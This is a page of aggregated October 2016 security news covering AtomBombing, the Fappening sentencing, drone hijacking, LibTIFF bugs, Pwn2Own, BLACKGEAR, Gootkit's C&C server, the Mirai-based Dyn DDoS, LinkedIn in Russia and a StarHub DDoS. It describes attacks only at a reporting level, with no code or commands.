English Articles - Úvod  Odborné èlánky  Bleskovky  Témata  List  EN  CZ  Seriály  Blogy  ÈlánkyCZ

Úvod  0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  28  29  30  31  32  33  34  35  36  37  38  39  40  41  42  43  44  45  46  47  48  49  50 


This Code Injection Technique can Potentially Attack All Versions of Windows
28.10.2016 thehackernews Vulnerebility
This Code Injection Technique can Potentially Attack All Versions of Windows
Guess what? If you own a Windows PC, which is fully-patched, attackers can still hack your computer.
Isn't that scary? Well, definitely for most of you.
Security researchers have discovered a new technique that could allow attackers to inject malicious code on every version of Microsoft's Windows operating system, even Windows 10, in a manner that no existing anti-malware tools can detect, threaten millions of PCs worldwide.
Dubbed "AtomBombing," the technique does not exploit any vulnerability but abuses a designing weakness in Windows.
New Code Injection Attack helps Malware Bypass Security Measures
AtomBombing attack abuses the system-level Atom Tables, a feature of Windows that allows applications to store information on strings, objects, and other types of data to access on a regular basis.
And since Atom are shared tables, all sorts of applications can access or modify data inside those tables. You can read a more detailed explanation of Atom Tables on Microsoft's blog.
A team of researchers from cyber security company EnSilo, who came up with the AtomBombing technique, say this design flaw in Windows can allow malicious code to modify atom tables and trick legitimate apps into executing malicious actions on its behalf.
Once injected into legitimate processes, the malware makes it easier for attackers to bypass security mechanisms that protect such systems from malware infections, the researchers said.
AtomBombing can Perform MITM Browser attack, Decrypt Passwords, and More
Besides process level restrictions bypass, the AtomBombing code injection technique also allows attackers to perform man-in-the-middle (MITM) browser attacks, remotely take screenshots of targeted user desktops, and access encrypted passwords stored on a browser.
Google Chrome encrypts your saved passwords using Windows Data Protection API (DPAPI), which uses data derived from the current user to encrypt or decrypt the data and access the passwords.
So, if malware is injected into a process which is already running in the context of the current user, it is easy to access those passwords in plain text.
Moreover, by injecting code into a web browser, attackers can modify the content shown to the user.
"For example, in a banking transaction process, the customer will always be shown the exact payment information as the customer intended via confirmation screens," said Tal Liberman, Security Research Team Leader of enSilo.
"However, the attacker modifies the data so that the bank receives false transaction information in favor of the attacker, i.e. a different destination account number and possibly amount."
No Patch for AtomBombing Attack
What's worse? The company said all versions of Windows operating system, including Microsoft's newest Windows 10, were affected. And What's even worse? There is no fix at this moment.
"Unfortunately, this issue cannot be patched since it does not rely on broken or flawed code – rather on how these operating system mechanisms are designed," said Liberman.
Since the AtomBombing technique exploits legitimate operating system functions to carry out the attack, Microsoft can not patch the issue without changing how the entire operating system works. This is not a feasible solution, so there is no notion of a patch.

AtomBombing Code Injection can potentially hack all Windows OS versions
28.10.2016 securityaffairs Vulnerebility

Researchers from ENSILO have devised a method, called AtomBombing, to inject malicious code in Windows OS that bypasses modern anti-malware tools.
Security experts from ENSILO have devised a method, called AtomBombing, to inject malicious code in Windows operating system that could not be detected by modern anti-malware tools.

The Atom Tables are data structures used by the operating system to store strings with an identifier to access them, they could have a global or local scope.

“An atom table is a system-defined table that stores strings and corresponding identifiers. An application places a string in an atom table and receives a 16-bit integer, called an atom, that can be used to access the string. A string that has been placed in an atom table is called an atom name.” reads a description published by Microsoft on the Atom Tables.

“The system provides a number of atom tables. Each atom table serves a different purpose. For example, Dynamic Data Exchange (DDE) applications use the global atom table to share item-name and topic-name strings with other applications.”

AtomBombing Code Injection

The attackers can then write malicious code into an atom table and force a legitimate application to retrieve it from the table. Once the code is retrieved by the legitimate application, it is possible to manipulate it triggering the execution of the malicious code.

“Our research team has uncovered a new way to leverage mechanisms of the underlying Windows operating system in order to inject malicious code. Threat actors can use this technique, which exists by design of the operating system, to bypass current security solutions that attempt to prevent infection. We named this technique AtomBombing based on the name of the underlying mechanism that this technique exploits.” states the analysis published by ENSILO.

The researchers explained that the AtomBombing technique relies on tricking a user into running a malicious executable that could allow them to conduct several malicious activities including memory data snooping to grab passwords and other sensitive information.

The experts highlighted that the AtomBombing method doesn’t exploit a flaw in the OS code, instead, it relies on a certain mechanism implemented by the Windows OS.

“Unfortunately, this issue cannot be patched since it doesn’t rely on broken or flawed code – rather on how these operating system mechanisms are designed.”

Crime doesn’t pay, Fappening hacker gets 18 months in jail
28.10.2016 securityaffairs Crime

The person behind the Fappening case, Ryan Collins (36), received a lighter penalty than the five years prison initially on the table for the guilty plea.
Do you remember the Fappening case? In 2014, a cache of nude photos and videos of celebrities was leaked online, hackers have stolen them by accessing the iCloud accounts of the victims.

The list of victims is long and includes Jennifer Lawrence and Kim Kardashian, the hacker has stolen the private images of the celebrities and leaked their nude photos onto 4chan.

In March the DoJ announced the arrest of the alleged culprit of the popular Fappening case. The US Department of Justice (DOJ) announced it charged Ryan Collins (36), of Pennsylvania for hacking Apple and Google E-Mail accounts belonging to more than 100 people, mostly celebrities.

“A Pennsylvania man was charged today with felony computer hacking related to a phishing scheme that gave him illegal access to over 100 Apple and Google e-mail accounts, including those belonging to members of the entertainment industry in Los Angeles.” states the press release issued by the DoJ.

the fappening

He was charged with hacking 50 iCloud and 72 Gmail accounts owned by Hollywood stars.

Collins admitted his responsibility and signed a plea agreement to plead guilty to a felony violation of the Computer Fraud and Abuse Act.

The man carried out spear phishing emails to the victims from November 2012 until the beginning of September 2014. In this way the man obtained the login credentials from its victims, then he illegally accessed their e-mail accounts to access sensitive and personal information.

The man behind the Fappening case focused his efforts to access nude pictures and videos from the victims, the DoJ announcement also revealed that in some circumstance he used a software to download the entire contents of the victims’ Apple iCloud backups.

In July, authorities arrested also a second man, Edward Majerczyk (28), he was charged with hacking 300 iCloud and Gmail accounts of which 30 belonged to Silver Screeners.

Both Majerczyk and Collins together hacked some 600 victims, for this reason, law enforcement has pled guilty to the charges involving sophisticated phishing attacks that saw them send malicious emails purporting to come from Apple and Google.

Collins received a lighter penalty than the five years prison initially on the table for the guilty plea.

The identity of the person who leaked the images is still a mystery.

'Celebgate' Hacker Gets 18 Months in Prison for Hacking Celebrity Nude Photos
28.10.2016 thehackernews Crime
'Celebgate' Hacker Gets 18 Months in Prison for Hacking Celebrity Nude Photos
The hacker who stole nude photographs of female celebrities two years ago in a massive data breach — famous as "The Fappening" or "Celebgate" scandal — has finally been sentenced to 18 months in federal prison, authorities said on Thursday.
36-year-old Lancaster, Pennsylvania man Ryan Collins was arrested in March and charged with hacking into "at least 50 iCloud accounts and 72 Gmail accounts," most of which owned by Hollywood stars, including Jennifer Lawrence, Kim Kardashian, and Kate Upton.
Now, a judge in Harrisburg, Pennsylvania, on Wednesday sentenced Collins to 18 months in federal prison after violating the Computer Fraud and Abuse Act.
Here's How Collins Stole Celebrities' Nude Photos
Federal prosecutors said Collins ran phishing scheme between November 2012 and September 2014 and hijacked more than 100 people using fake emails disguised as official notifications from Google and Apple, asking victims for their account credentials.
"When the victims responded, Collins then had access to the victims' e-mail accounts. After illegally accessing the e-mail accounts, Collins obtained personal information including nude photographs and videos," the Justice Department said in a statement.
"In some instances, Collins would use a software program to download the entire contents of the victims' Apple iCloud backups. In addition, Collins ran a modeling scam in which he tricked his victims into sending him nude photographs."
Many of the compromised accounts belonged to famous female celebrities including Jennifer Lawrence, Kim Kardashian, Kate Upton, Kirsten Dunst, Aubrey Plaza, Rihanna, Avril Lavigne and Gabrielle Union.
Another suspect, Edward Majerczyk, 28-years-old of Illinois, pleaded guilty in July and charged with hacking 300 Gmail and iCloud accounts. However, authorities have yet to identify the uploader or 'leaker' of the photographs stolen by Collins and Majerczyk.
According to officials, Collins and Majerczyk hacked over 600 victims by their social engineering tricks.
Collins faced a maximum of five years in prison, but as part of his plea deal, prosecutors proposed a lighter sentence of only 18 months.

You Can Hijack Nearly Any Drone Mid-flight Using This Tiny Gadget
28.10.2016 thehackernews Hacking

Now you can hijack nearly any drone mid-flight just by using a tiny gadget.
Security researcher Jonathan Andersson has devised a small hardware, dubbed Icarus, that can hijack a variety of popular drones mid-flight, allowing attackers to lock the owner out and give them complete control over the device.
Andersson, who is the manager of Trend Micro's TippingPoint DVLab division, demonstrated this new hack at this year's PacSec security conference in Tokyo, Japan on Wednesday.
Besides Drones, the new gadget has the capability of fully hijacking a wide variety of radio-controlled devices, including helicopters, cars, boats and other remote control gears that run over the most popular wireless transmission control protocol called DSMx.
DSMx is a protocol used to facilitate communication between radio controllers and devices, including drones, helicopters, and cars.
This is not the first hardware that can hijack drones mid-flight. There are jamming devices available in the market that block controlling radio signals and render a drone useless. However, these devices do not give you control like Icarus does.
Icarus works by exploiting DMSx protocol, granting attackers complete control over target drones that allows attackers to steer, accelerate, brake and even crash them.
The loophole relies on the fact that DSMx protocol does not encrypt the 'secret' key that pairs a controller and hobbyist device. So, it is possible for an attacker to steal this secret key by launching several brute-force attacks, Andersson explained in his presentation.
Once the drone hijacker, Icarus box, grabs the key, an attacker can send malicious packets to restrict the original owner of the drone from sending legitimate control commands. Instead, the drone will accept commands from the attacker.
You can also watch the demonstration video to learn more about Icarus box.

There's little to be done to mitigate this issue, and affected manufacturers are releasing patches and updated hardware, and securing the industry-wide encryption protocol in future drones.
"My guess is that it will not be easy to completely remedy the situation. The manufacturers and partners in the ecosystem sell standalone radio transmitters, models of all kinds, transmitters that come with models and standalone receivers," Andersson told Ars Technica.
"Only a certain set of standalone transmitters have a firmware upgrade capability, though the fix is needed on the model/receiver side."
Icarus has not been made available for sale, but this kind of gadget could benefit law enforcement as well as people who are worried about their safety and privacy. However, same could also be used for nefarious purposes.
So, next time if any annoying drone fly your overhead? Just hijack it and land it safely, rather than shooting it down.

The Icarus box is able to hijack nearly any drone mid-flight
28.10.2016 thehackernews Hacking

A security researcher presented a small hardware named Icarus box that is able to hijack a variety of popular drones mid-flight.
It could be very easy to hijack nearly any drone mid-flight by using the hardware presented by the Trend Micro researcher Jonathan Andersson at the PacSec hacking conference in Japan this week. Andersson, who leads the Trend Micro’s TippingPoint DVLab division, presented a small hardware named Icarus that is able to hijack a variety of popular drones mid-flight, the attacker is able to gain full control of the vehicle by locking the owner out.

According to Andersson, the Icarus box is able to hack into and radio controlled vehicles that run the SMx radio platform. Unfortunately, the SMx radio platform is very popular for drones, it present in vehicles manufactured by many vendors, including Walkera, NineEagles and AirTronics.
icarus box -drones-hacking

“It’s not a jamming system so i am not competing for control via RF power,” Andersson explained to Vulture South.

“Full flight control is achieved with the target experiencing a complete loss of control — it’s a clean switch-over.

“The range of my proof of concept implementation is equal to a standard DSMx radio transmitter, though standard 2.4GHz ISM band amplification can be applied to extend the range.”

The principle behind the Icarus box is simple, the hardware is able to determine the unique shared secret key within the DSMx binding process by monitoring the activity of the component and running a brute force attack. Once the Icarus box grabs the key, the attacker can send malicious packets to lock the legitimate controller out and send his commands.
Below a video PoC of the attack
“It works against all DSMx based radio systems, which would include drones, airplanes, cars, boats, and so on,” Andersson added.
The only way to protect the drone against such kind of attack is by updating receivers’ firmware protocols, an operation that is not always possible on many drones.

“My guess is that it will not be easy to completely remedy the situation. The manufacturers and partners in the ecosystem sell standalone radio transmitters, models of all kinds, transmitters that come with models and standalone receivers,” Andersson told Ars Technica.

“Only a certain set of standalone transmitters have a firmware upgrade capability, though the fix is needed on the model/receiver side.”

Below the slides prepared by Andersson.

Three bugs found in the LibTIFF, one of them yet to be patched
28.10.2016 securityaffairs Vulnerebility

Libtiff library is affected by three vulnerabilities but unfortunately one of them, tracked as CVE-2016-8331, is still unpatched.
Libtiff is a library for reading and writing Tagged Image File Format (abbreviated TIFF) files and according to the experts from CISCO Talos it is affected by three vulnerabilities. The bugs could be exploited by hackers to hack a system by using booby-trapped images. The bad news is that only two of three vulnerabilities have been fixed.

The vulnerabilities affect the latest version 4.0.6, released in September.

CVE-2016-5652 (TALOS-2016-0187) – LibTIFF tiff2pdf JPEG Compression Tables Heap Buffer Overflow
CVE-2016-8331 (TALOS-2016-0190) – LibTIFF FAX IFD Entry Parsing Type Confusion
CVE-2016-5875 (TALOS-2016-0205) – LibTIFF PixarLogDecode Heap Buffer Overflow
The Talos post says the company found the bugs in LibTiff – 4.0.6, released in September.

The LibTIFF FAX IFD Entry Parsing Type Confusion affects the LibTIFF code called BadFaxLines specific for fax systems, it could be exploited by using a specifically crafted image that triggers an out of bounds memory error, leading to remote code execution. This vulnerability is still unpatched.

“CVE-2016-8331 occurs during the parsing and handling of TIFF images using the LibTIFF API that is present in the standard build. RFC 2306 defines a series fields used within the TIFF format for use specifically in fax systems which are fully supported by the LibTIFF library.” states the analysis published by CISCO Talos. “The vulnerability exists in the handling of one of these fields, `BadFaxLines`, that can result in a write to out of bounds memory. Attackers can create a specially crafted TIFF file to exploit this vulnerability and execute arbitrary code on affected systems.”

The CVE-2016-5652 is a heap buffer overflow that resides in the Tiff2PDF tool. Attackers can exploit it by using a crafted file that can lead the library crashing.


CVE-2016-5875 is a heap buffer overflow that resides in the way compressed TIFF images in LibTIFF’s PixarLogDecode API are handled.

“To decompress the PixarLog compressed data inside of a TIFF image, LibTIFF uses the Zlib compression library. First, a buffer with the parameters needed to be passed to Zlib are set up with a function call to `PixarLogSetupDecode`. Later this buffer is used when calling the Zlib library function `inflate` which is responsible for the actual decompression. Passing an undersized buffer into the Zlib `inflate` function causes a heap overflow that could be potentially leveraged into remote code execution.”

The vulnerability was reported by Mathias Svensson, of Google’s Security Team, meanwhile the researcher Evan Rouault of SpatialSys published a fix on GitHub.

that is used to manage JPEG compression for TIFF images. The flaw was reported by the Google’s Security Team, Mathias Svensson. The researcher Evan Rouault of SpatialSys published a fix for the flaw and published the code on GitHub.

“TIFF offers support for multiple compression algorithms inside of the image itself. One such algorithm is the JPEG compression. This vulnerability arises in the calculating of the images tile size. A specially crafted TIFF image file can lead to an out of bounds write and ultimately to remote code execution. An attacker who can trick a user into using this utility with a crafted TIFF document can cause a heap based buffer overflow that results in remote code execution.” continues the analysis.

Chinese Hackers won $215,000 for Hacking iPhone and Google Nexus at Mobile Pwn2Own
27.10.2016 thehackernews Security
Chinese Hackers won $215,000 for Hacking iPhone and Google Nexus at Mobile Pwn2Own
The Tencent Keen Security Lab Team from China has won a total prize money of $215,000 in the 2016 Mobile Pwn2Own contest run by Trend Micro's Zero Day Initiative (ZDI) in Tokyo, Japan.
Despite the implementation of high-security measures in current devices, the famous Chinese hackers crew has successfully hacked both Apple's iPhone 6S as well as Google's Nexus 6P phones.
Hacking iPhone 6S
For hacking Apple's iPhone 6S, Keen Lab exploited two iOS vulnerabilities – a use-after-free bug in the renderer and a memory corruption flaw in the sandbox – and stole pictures from the device, for which the team was awarded $52,500.
The iPhone 6S exploit successfully worked despite the iOS 10 update rolled out by Apple this week.
Earlier this week, Marco Grassi from Keen Lab was credited by Apple for finding a serious remote code execution flaw in iOS that could compromise a victim's phone by just viewing "a maliciously crafted JPEG" image.
However, a  from Keen Team indicated it was able to make the attack successfully work on iOS 10.1 as well.
The Keen Lab also managed to install a malicious app on the iPhone 6S, but the app did not survive a reboot due to a default configuration setting, which prevented persistence. Still, the ZDI awarded the hackers $60,000 for the vulnerabilities they used in the hack.
Hacking Google's Nexus 6P
For hacking the Nexus 6P, the Keen Lab Team used a combination of two vulnerabilities and other weaknesses in Android and managed to install a rogue application on the Google Nexus 6P phone without user interaction.
The ZDI awarded them a whopping $102,500 for the Nexus 6P hack.
So, of the total potential payout of $375,000 from the Trend Micro's Zero Day Initiative, the Keen Lab Team researchers took home $215,000.

Hackers behind the BLACKGEAR espionage campaign now targets Japan
27.10.2016 securityaffairs Cyber
The threat actor behind the Blackgear cyber-espionage campaign that is targeting Japanese entities is the same that hit Taiwan in 2012.
According to security experts from Trend Micro, Japanese organizations were targeted in an espionage campaign dubbed Blackgear.

Attackers behind the Blackgear appear to be the same that targeted users in Taiwan in 2012, they used a well-known strain of malware detected by many security firms as Elirks.

The attack vectors are spear phishing emails or compromised websites used to serve the malware in watering hole attack. The websites used in the watering hole attacks were used to download a malicious code that drops decoy documents and the downloaders used to fetch the backdoors used by the group (i.e. Elirks and Ymalr).

The researchers noticed that the both Elirks and Ymalr used as command and control (C&C) infrastructure blogging services in order to make harder their detection and , allowing the attackers to keep the location of the actual C&C server hidden and easily change the server that is in use.

“BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years. Multiple papers and talks have been released covering this campaign, which used the ELIRKS backdoor when it was first discovered in 2012. It is known for taking using blogs and microblogging services to hide the location of its actual command-and-control (C&C) servers. This allows an attacker to change the C&C server used quickly by changing the information in these posts.” read the blog post published by TrendMicro.

“Like most campaigns, BLACKGEAR has evolved over time. Our research indicates that it has started targeting Japanese users. “


The researchers speculate the BLACKGEAR has evolved over time and threat actors behind the espionage campaign now moved to Japan. The decoy documents used in the attacks are now in Japanese and the blogging services used as part of the C&C infrastructure are based in Japan.

The experts from PaloAlto Network arrived at the same conclusion after they noticed some cyber attacks against organizations in Japan this summer that presented many similarities with attacks against targets in Taiwan.

Inside the Gootkit C&C server
27.10.2016 Kaspersky Virus
The Gootkit bot is one of those types of malicious program that rarely attracts much attention from researchers. The reason is its limited propagation and a lack of distinguishing features.

There are some early instances, including on Securelist (here and here), where Gootkit is mentioned in online malware research as a component in bots and Trojans. However, the first detailed analysis was published by researchers around two years ago. That was the first attempt to describe the bot as a standalone malicious program, where it was described as a “new multi-functional backdoor”. The authors of that piece of research put forward the assertion that the bot’s features were borrowed from other Trojans, and also provided a description of some of Gootkit’s key features.

In September 2016, we discovered a new version of Gootkit with a characteristic and instantly recognizable feature: an extra check of the environment variable ‘crackme’ in the downloader’s body. This feature was not present in the early versions. Just as interesting was the fact that we were able to gain access to the bot’s C&C server, including its complete hierarchal tree of folders and files and their contents.


As was the case earlier, the bot Gootkit is written in NodeJS, and is downloaded to a victim computer via a chain of downloaders. The main purpose of the bot also remained the same – to steal banking data. The new Gootkit version, detected in September, primarily targets clients of European banks, including those in Germany, France, Italy, the Netherlands, Poland, etc.

The Trojan’s main propagation methods are spam messages with malicious attachments and websites containing exploits on infected pages (Rig Exploit Kit). The attachment in the spam messages contained Trojan-Banker.Win32.Tuhkit, the small initial downloader that launched and downloaded the main downloader from the C&C server, which in turn downloaded Gootkit.

Inside the Gootkit C&C server

Examples of infected pages used to spread the Trojan

While carrying out our research we detected a huge number of the initial downloader versions that were used to distribute the Trojan – most of them are detected as Trojan.Win32.Yakes. Some of the loaders were extremely odd, like the one shown below. It clearly stated in its code that is was a loader for Gootkit.

Inside the Gootkit C&C server

Section of code from one of the initial downloaders

Some versions of Gootkit are also able to launch the main body with administrator privileges bypassing UAC. To do so, the main loader created an SDB file and registered it in the system with the help of the sdbinst.exe utility, after which it launched the bot with elevated privileges without notifying the user.

‘Crackme’ check

The new version of Gootkit is distinct in that it checks the environment variable ‘crackme’ located in the downloader body. It works as follows: the value of the variable is compared to a fixed value. If the two values differ, the bot starts to check if it has been launched in a virtual environment.

Inside the Gootkit C&C server

Checking the global variable in the downloader’s body

To do so, the bot checks the variable ‘trustedcomp’, just like it did in earlier versions.

Inside the Gootkit C&C server

Checking the bot’s body for launch in a virtual environment

The Trojan’s main body

The Trojan’s main file includes a NodeJS interpreter and scripts. After unpacking, the scripts look like this:

Inside the Gootkit C&C server

NodeJS scripts that make up the Trojan’s main body

The scripts shown in the screenshot constitute the main body of the Trojan. Gootkit has about a hundred various scripts, but they are mostly for practical purposes (intermediate data handlers, network communication DLLs, wrapper classes implementations, encoders etc.) and not of much interest.

The Trojan itself is distributed in an encrypted and packed form. Gootkit is encrypted with a simple XOR with a round key; unpacking is performed using standard Windows API tools. The screen below shows the first 255 bytes of the transferred data.

Inside the Gootkit C&C server

The Trojan’s packed body

The first three DWORDs denote the sizes of the received, unpacked and packed data respectively. One can easily check this by subtracting the third DWORD from the first DWORD, which leaves 12 bytes – i.e., the size of these variables.

Stealing money

Interception of user data is done the standard way, via web injections into HTTPS traffic (examples of these web injects are shown below). After the data is sent to the C&C server, it is processed by parsers, each of which is associated with the website of a specific bank.

Inside the Gootkit C&C server

Fragment of parser code

Communication with the C&C

In the version of Gootkit under review, the C&C address is the same as the address from which the Trojan’s main body is downloaded; in earlier versions, these two addresses sometimes differed. While generating a request, the Trojan uses its unique User Agent – any request that does not specify a User Agent will be denied.

Inside the Gootkit C&C server

The unique GootKit User Agent

Communication with the C&C comes down to the exchange of a pre-defined set of commands, the main ones being:

Request a list of files available to the Trojan (P_FS:FS_READDIR);
Receive update for the bot (P_FS: FS_GETFILE);
Obtain screenshot (P_SPYWARE:SP_SCREENSHOT);
Upload list of processes (P_SPYWARE:SP_PROCESSLIST);
Terminate process (P_SPYWARE:SP_PROCESSKILL);
Download modules (P_FS: FS_GETFILE);
Receive web injects (P_ SPYWARE:SP_SPYWARE_CONFIG).
Inside the Gootkit C&C server

The bot’s main commands and sub-commands

The C&C addresses (two or three in number) are hardwired in the loader’s body and can also be saved in the registry. The body of the data packet may vary depending on the request type, but always includes the following variables:

Size of data packet, plus eight;
Check value XORed with a constant;
Command type;
Command sub-type.
In the screen below, the C&C requests registration information from the bot during its first launch.

Inside the Gootkit C&C server

Request from C&C, example of variables

The response in this case will contain detailed information about the infected computer, including:

Network adapter parameters;
CPU details, amount of RAM;
User name, computer name.
Regardless of the request type, data is communicated between the C&C and the bot in the format protobuf.

When the main body is downloaded, the address that the loader contacts typically ends in one of the following strings:

Mystery solved…rather easily

We found a configuration error that often appears on botnet C&C servers and took advantage of it to capture a complete tree of folders and files, as well as their contents, from one of the GootKit C&C servers.


Contents of GootKit C&C server

The C&C server contains a number of parsers for different banking sites. These parsers are used (provided the user data is available) to steal money from user accounts and to send notifications via Jabber. The stolen data is used in the form of text files, with the infected computer’s IP address used as the file name.

Inside the Gootkit C&C server

Stolen data and logs on the bot’s C&C server

Inside the Gootkit C&C server

Example of stolen data in one of the text files

Other data (bank transfers and logs) is also stored in text file format.

Inside the Gootkit C&C server

Parser logs

An analysis of the bot’s web injects and parser logs has shown that the attackers primarily target the clients of German and French banks.

Inside the Gootkit C&C server

Distribution of web injects across domain zones

Inside the Gootkit C&C server

Excerpts from parser logs

Analysis of the server content and the parsers made it clear that the botnet’s creator was a Russian speaker. Note the comments in the screen below.

Inside the Gootkit C&C server

A fragment of script including the author’s comments in Russian

Moreover, Gootkit most probably has just one owner – it’s not for sale anywhere and, regardless of the downloaders’ modifications or type of admin panel, the code in NodeJS (the Trojan’s main body) is always the same.

Inside the Gootkit C&C server

Examples of Gootkit web injects


Gootkit belongs to a class of Trojans that are extremely tenacious, albeit not very widespread. Because it’s not very common, new versions of the Trojan may remain under the researchers’ radar for long periods.

It should also be noted that the users of NodeJS as a development platform set themselves certain limitations, but simultaneously get a substantial degree of flexibility and simplicity when creating new versions of the Trojan.

Kaspersky Lab’s security products detect the Trojan GootKit and all its associated components under the following verdicts:

Trojan-Banker.Win32.Tuhkit (the initial downloader distributed via emails);
Trojan.Win32.Yakes (some modifications of the main downloader);
HEUR:Trojan.Win32.Generic (the bot’s main body, some modifications of the downloader).


Friday's Massive DDoS Attack Came from Just 100,000 Hacked IoT Devices
27.10.2016 thehackernews Attack
Friday's DDoS Attack Came from Just 100,000 Infected IoT Devices
Guess how many devices participated in last Friday's massive DDoS attack against DNS provider Dyn that caused vast internet outage?
Just 100,000 devices.
I did not miss any zeros.
Dyn disclosed on Wednesday that a botnet of an estimated 100,000 internet-connected devices was hijacked to flood its systems with unwanted requests and close down the Internet for millions of users.
Dyn executive vice president Scott Hilton has issued a statement, saying all compromised devices have been infected with a notorious Mirai malware that has the ability to take over cameras, DVRs, and routers.
"We're still working on analyzing the data but the estimate at the time of this report is up to 100,000 malicious endpoints," Hilton said. "We are able to confirm that a significant volume of attack traffic originated from Mirai-based botnets."
Mirai malware scans for Internet of Things (IoT) devices that are still using their default passwords and then enslaves those devices into a botnet, which is then used to launch DDoS attacks.
A day after the attack, Dyn confirmed that a botnet of Mirai malware-infected devices had participated in its Friday's Distributed Denial of Service attacks.
However, after an initial analysis of the junk traffic, just yesterday, the company revealed that it had identified an estimated 100,000 sources of malicious DDoS traffic, all originating from IoT devices compromised by the Mirai malware.
Earlier the company believed that approximately "tens of millions" of IP addresses were responsible for the massive attack against its crucial systems, but the actual number came out to be much much less, leaving all of us wondering, as:
How did the Attack Succeed to this Massive Level?
To this, Hilton said that Domain Name System protocol itself has the ability to amplify requests from legitimate sources.
"For example, the impact of the attack generated a storm of legitimate retry activity as recursive servers attempted to refresh their caches, creating 10-20X normal traffic volume across a large number of IP addresses," Hilton said. "When DNS traffic congestion occurs, legitimate retries can further contribute to traffic volume."
"It appears the malicious attacks were sourced from at least one botnet, with the retry storm providing a false indicator of a significantly larger set of endpoints than we now know it to be."
Friday's cyber attack overwhelmed Dyn's central role in routing and managing Internet traffic, rendering hundreds of sites and services, including Twitter, GitHub, Amazon, Netflix, Pinterest, Etsy, Reddit, PayPal, and AirBnb, inaccessible to Millions of people worldwide for several hours.
Dyn did not disclose the actual size of the attack, but it has been speculated that the DDoS attack could be much bigger than the one that hit French Internet service and hosting provider OVH that peaked at 1.1 Tbps, which is the largest DDoS attack known to date.
According to the company, this attack has opened up an important debate about Internet security and volatility.
"Not only has it highlighted vulnerabilities in the security of 'Internet of Things' (IOT) devices that need to be addressed, but it has also sparked further dialogue in the Internet infrastructure community about the future of the Internet," Hilton said.
Next DDoS Attack could reach Tens Of Terabits-Per-Second
If the IoT security is not taken seriously, the future DDoS attack could reach tens of terabits-per-second, as estimated by network security firm Corero.
The DDoS threat landscape is skyrocketing and could reach tens of terabits-per-second in size, following a discovery of a new zero-day attack vector that has the ability to amplify DDoS attacks by as much as 55x, Corero warned in a blog post published Tuesday.
According to the security firm, this new attack vector uses the Lightweight Directory Access Protocol (LDAP), which if combined with an IoT botnet, could break records in DDoS power.
Dave Larson of Corero explains:
"LDAP is not the first, and will not be the last, protocol or service to be exploited in this fashion. Novel amplification attacks like this occur because there are so many open services on the Internet that will respond to spoofed record queries. However, a lot of these attacks could be eased by proper service provider hygiene, by correctly identifying spoofed IP addresses before these requests are admitted to the network."
You can read more on Corero's official website.
How to Protect your Smart Device from being Hacked
1. Change Default Passwords of your connected devices: If you have got any internet-connected device at home or work, change your credentials if it still uses default ones. Keep in mind; Mirai malware scans for default settings.
2. Disable Universal Plug-and-Play (UPnP): UPnP comes enabled by default in every IoT device, which creates a hole in your router's security, allowing malware to infiltrate any part of your local network.
Check for "Universal Plug and Play" features and turn them OFF.
3. Disable Remote Management through Telnet: Go into your router’s settings and disable remote management protocol, specifically through Telnet, as this is a protocol used for allowing one computer to control another from a remote location. It has also been used in previous Mirai attacks.
4. Check for Software Updates and Patches: last but not the least, always keep your connected devices and routers up-to-date with the latest vendor firmware.
Check if your IoT device is vulnerable to Mirai malware
There is an online tool called Bullguard's IoT Scanner that can help you check if any IoT device over your network is vulnerable to Mirai malware.
If it detects any, contact the device's manufacturer or lookout for a solution to patch those vulnerable gaps.
The tool makes use of the vulnerability scanning service Shodan for finding unprotected computers and webcams on your home network that are exposed to the public and potentially accessible to hackers.

LinkedIn to get Banned in Russia for not Complying with Data Localization Law
27.10.2016 thehackernews Social
The world's largest online professional network LinkedIn could face a ban in Russia after the company has failed to comply with a Russian data localization law that compels companies to keep data on Russian users in their country.
If you are not aware, LinkedIn is the only major social network which is not banned in China, because the company agreed to cooperate with the Chinese government and remove controversial content.
However, LinkedIn could be the first social network in Russia to be blocked by the Russian state's federal media regulator, called Roskomnadzor, for not complying with the rules.
In July 2014, the Russia approved amendments to the Russian Personal Data Law which came into force in 1st September 2015, under which foreign tech companies were required to store the personal data of its citizens within the country.
However, Russia was not the first country to enforce such law on foreign tech companies. A few months ago, Iran also imposed new regulations on all foreign messaging and social media apps to move 'data and activity' associated with Iranian citizens onto servers in Iran within one year.
The law was in an attempt to protect its citizen's data from the NSA's mass surveillance revealed by whistleblower Edward Snowden.
Big technology companies, such as Google, Apple, and Viber, have reportedly already moved some of their servers to Russia this year.
However, companies like Facebook, Microsoft, Twitter denied complying with the law. But, the Russian Internet watchdog Roskomnadzor has targeted LinkedIn in its first attempt to pressurize foreign companies to comply with its new privacy law.
Roskomnadzor has chosen LinkedIn its first target due to the company's history of security problems. The massive 2012 hack in LinkedIn exposed over 117 Million passwords and usernames.
"They have a bad track record: Every year there’s a major scandal about the safety of user data," Roskomnadzor spokesman Vadim Ampelonskiy told the Moscow Times.
Roskomnadzor said not even LinkedIn refused to move its servers to Russia, but the company also collects and sends data about its citizen who are not even users of the social network without their consent.
"We are seeking a court order to block LinkedIn. We twice sent requests in the summer, but they did not provide answers to our questions," Ampelonskiy told the TASS news agency.
Moscow’s Tagansky District Court has also ruled in favor of the Roskomnadzor, though LinkedIn has appealed to a higher court for removing the ban. The Moscow City Court will announce the decision on November 10.
The watchdog says they will remove the ban if the social networking company provides information that it has comply with the law and moved its servers with data about Russians to their country.
Roskomnadzor – also known as the Federal Service for Supervision in the Sphere of Telecom, Information Technologies, and Mass Communications – is Russia's telecoms watchdog that runs a huge blacklist of websites banned in Russia.

Massive DDoS attacks caused broadband outages to StarHub customers
27.10.2016 securityaffairs Attack

Massive DDoS attacks caused broadband outages to StarHub customers,it is the first time that Singapore has experienced such an attack on its infrastructure.
StarHub in Singapore is the latest victim of a massive DDoS attacks powered with compromised IoT devices against its DNS infrastructure.

It seems that hackers used kit owned by its customers, the company mitigated the attacks by filtering the malicious traffic and increasing the DNS capacity.

“StarHub Confirms Cause of Home Broadband Incidents on 22 October and 24 October 2016

Singapore, 25 October 2016 – We have completed inspecting and analyzing network logs from the home broadband incidents on 22 October and 24 October and we are now able to confirm that we had experienced intentional and likely malicious distributed denial-of-service (DDoS) attacks on our Domain Name Servers (DNS). These caused temporary web connection issue for some of our home broadband customers.” reads a message published on Facebook by the company.

“On both occasions, we mitigated the attacks by filtering unwanted traffic and increasing our DNS capacity and restored service within two hours.”

The DNS server of the company was hit by a huge volume of traffic that knocked some home broadband customers offline.

